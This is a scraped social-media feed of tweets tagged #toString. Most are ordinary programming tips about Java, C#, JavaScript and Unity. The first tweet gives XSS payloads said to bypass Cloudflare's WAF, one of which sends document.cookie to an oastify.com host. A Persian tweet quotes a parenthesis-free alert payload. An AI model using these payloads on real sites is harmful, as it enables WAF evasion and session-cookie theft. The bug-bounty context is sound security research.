Explore tweets tagged as #toString
@nav1n0x
N$
1 month
This payload bypasses Cloudflare waf in certain cases: "top[8680439. toString(30)](document.domain)" or "top[8680439. toString(30)](new%20Image().src%3D%27 https://xxx.oastify.com/log?cookie%3D%27%2Bdocument.cookie)" #BugBounty
Tweet media one
Tweet media two
8
86
533
@eriknordeus
Erik Nordeus 💙💛
9 hours
I've had the need to display matrix elements in Unity's Console window. To line them up nicely you can use PadLeft() like this: string stringNumber = element.ToString("F5").PadLeft(12, ' '); while setting the Console window to use Monospace font! #UnityTips
Tweet media one
Tweet media two
0
0
2
@Himanshi1286
Himanshi
11 days
🚀 Day 12 Progress.📘 Java OOPs 🔍: super, method overriding, .toString().💻 Practiced old codes + cleaned logic.🧠 DSA (Arrays):.✔️ Check if array is sorted.✔️ Remove duplicates.✔️ Remove in-place duplicates.#100DaysOfCode #Java #DSA #CodingJourney
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
0
36
@Dave_DotNet
Dave Callan | dotnet
2 months
Using nameof rather than ToString() in #dotnet when referencing an enum member name is a perfectly valid performance optimization technique. Absolutely nothing bogus about this, ReSharper even has an inspector for it. It moves the outputting of a constant to compile time so
Tweet media one
11
9
115
@ellishlomo
🏴‍☠️ Elli Shlomo (IR)
2 months
Detect a potential abuse related to dMSA through MDI and AHQ. IdentityDirectoryEvents.| where ActionType == "Service creation".| extend ParsedFields = parse_json(AdditionalFields).| extend.ServiceName = tostring(ParsedFields.ServiceName),.ServiceCommand =
Tweet media one
0
16
86
@awirshf090
Amir Shojaei
25 days
خیلی وقت بود که می‌خواستم این کتاب و شروع کنم. الان به صفحه‌ی 20 که رسیدم فهمیدم واقعا کتاب خفنیه. toString=alert;window+''.می‌دونستید این پیلود به این کوچیکی ولیده :).توی کتاب با جزییات توضیح داده چی شد که تونستیم بدون پرانتز JS بنویسیم. خیلی کتابش پیشنهاد میشه ^-^
Tweet media one
4
1
53
@guyrleech
Guy Leech
2 months
Here's an easy PowerShell way to create any size test data files. fsutil can do it too. $bytes = New-Object byte[] (5MB).1. 5|%{ date;$file = "$env:userprofile\downloads\$env:COMPUTERNAME.$env:USERNAME.$([int]($bytes.Count/1MB))MB.$([datetime]::Now.ToString('HHmmss')).$_.bin" ;
Tweet media one
0
9
34
@DevLeaderCa
devleader
11 days
When using flag enums in CSharp, did you know. When we call ToString() on a flags enum value, it will print out each of the flag values being matched!. This is a huge readability boost, especially when debugging. Mentally flip-flopping between numeric and string
0
0
2
@marcioendo
Marcio Endo
4 months
The 'Objects::toIdentityString' method was introduced in JDK 19. It produces the output of 'Object::toString' as if it and 'Object::hashCode' were not overridden.
Tweet media one
1
6
44
@GATIKOItyan
どろろろ
29 days
public class Main {. public static void main(String[] args) {. StringBuilder sb = new StringBuilder();. for (int i = 0; i < 15; i++) {. sb.append("あ");. }. sb.append("!!!!!!!!!!");. System.out.println(sb.toString());. }.}
Tweet media one
0
0
0
@iamsaquibdev
Saquib Aftab
3 months
Java Lombok ✅: All in One Annotation : @ Data. This annotation combines some common Lombok annotations into one:. @ ToString.@ Getter.@ Setter.@ EqualsAndHashCode.@ RequiredArgsConstructor
Tweet media one
1
11
110
@TeraUnXf5
あだち@エンジニア
30 days
[自作ゲームエンジン制作] . 昨日はEXPORT_ENUMの機能を改良してました。.EXPORT_ENUMを付けたEnum値はエディタ側(C#)でも使えるようにビルド時に公開されるのですが、合わせてデバック表示用のToStringも自動出力するようにしてみました!🥺. #ゲーム制作 .#プログラミング
Tweet media one
0
3
61
@esme_raida
Raeedah 🐾
3 months
Day 31 of 100.Worked on the Pomodoro Timer logic today! That's the timer page itself. • Got Start, Pause & Reset buttons working.• Learnt about .toString() and .padStart().Really enjoyed building this part,feels good seeing it come to life!
3
3
16
@developertomek
Tomek
2 months
Did you know? 🤔. Every function in JavaScript has a built-in .toString() method that returns the source code of the function as a string!.Debug tricky callbacks, log function defs for audits, or inspect code in dynamic tools.
Tweet media one
4
4
14
@PAWARsoham_
soham PAWAR
29 days
Day 4 – of Learning JavaScript .today's work :-. -Begin with Arrays. -Array methods like .toString,join, pop, push, shift, etc. - learned looping through arrays: forEach, map, filter.More to learn in this. Till now, I haven't come across any challenging parts in JavaScript
Tweet media one
Tweet media two
0
0
7
@fuma_nama
Fuma Nama
3 months
I just learned you can actually call `.toString()` on a function in JS, and it gives you the source code of that (arrow) function
Tweet media one
8
6
127
@Kushal_Koradia
Kushal Koradia
3 months
Completed Lecture 12/69 of @kunalstwt’s DSA Bootcamp:.• Why we need Arrays.• Syntax & structure.• Array memory & internal working.• null in Java.• for-each loop & toString().• Array of Objects & Heap storage. Loving the depth of Java explained! Thanks @kunalstwt!. #Java
Tweet media one
2
0
15
@kenyanJug
KenyaJug🇰🇪
3 months
JEP 395: Records .Author: Gavin Bierman.Delivered in: Java 16.Records eliminate boilerplate by automatically generating constructors, accessors, equals(), hashCode(), and toString() methods. Designed for transparency and conciseness
0
3
4
@sigma_axis
sigma_axis
16 days
これ,スクリプトでの色指定にも AviUtl1 と不整合がありますね.16進法で数値を渡しても,一旦tostringしてから16進法として解釈するという挙動みたいです.バグなのか仕様なのかはわかりませんが,string.format("%06x", color)みたいに文字列で渡すのが無難みたいです (beta4で確認). #AviUtl2
Tweet media one
@sigma_axis
sigma_axis
17 days
AviUtl2 の合成モードの "alpha_add" が何かおかしい?α値 50% ずつを合成しても 100% にならずに 75% になります.また,2回目の合成直前に白に単色化を挟むと逆に暗くなります..AviUtl1 だと確か,乗算済みピクセル形式での単純和に相当する挙動だったはず..#AviUtl2
Tweet media one
Tweet media two
0
3
14